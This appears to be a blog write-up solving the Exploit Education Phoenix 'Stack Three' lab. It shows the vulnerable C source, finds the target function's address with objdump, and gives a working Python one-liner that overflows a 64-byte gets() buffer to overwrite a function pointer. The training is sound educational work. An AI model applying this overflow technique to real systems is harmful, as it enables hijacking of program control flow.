Exploit Education | Phoenix | Stack Three Solution

Stack Three

The description and source code can be found here:
https://exploit.education/phoenix/stack-three/

This time we need to overwrite a function pointer that’s being stored on the stack. We need to get the program to call the complete_level() function:

void complete_level() {
    printf("Congratulations, you've finished " LEVELNAME " :-) Well done!\n");
    exit(0);
}

The program initializes the “fp” pointer variable to NULL, gets a string from user input, saves it to the “buffer” variable, and calls whatever is stored in “fp” as if it were a function:

struct {
    char buffer[64];
    volatile int (*fp)();
} locals;

printf("%s\n", BANNER);

locals.fp = NULL;
gets(locals.buffer);

if (locals.fp) {
    printf("calling function pointer @ %p\n", locals.fp);
    fflush(stdout);
    locals.fp();
    ...

We can use objdump to get address of the complete_level() function:

user@phoenix-amd64:/opt/phoenix/amd64$ objdump -d stack-three | grep complete_level
000000000040069d <complete_level>:

So we should be able to put 0x40069d into the “fp” pointer to get that function to call:

user@phoenix-amd64:/opt/phoenix/amd64$ python -c 'print "A"*64 + "\x9d\x06\x40"' | ./stack-three
Welcome to phoenix/stack-three, brought to you by https://exploit.education
calling function pointer @ 0x40069d
Congratulations, you've finished phoenix/stack-three :-) Well done!

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.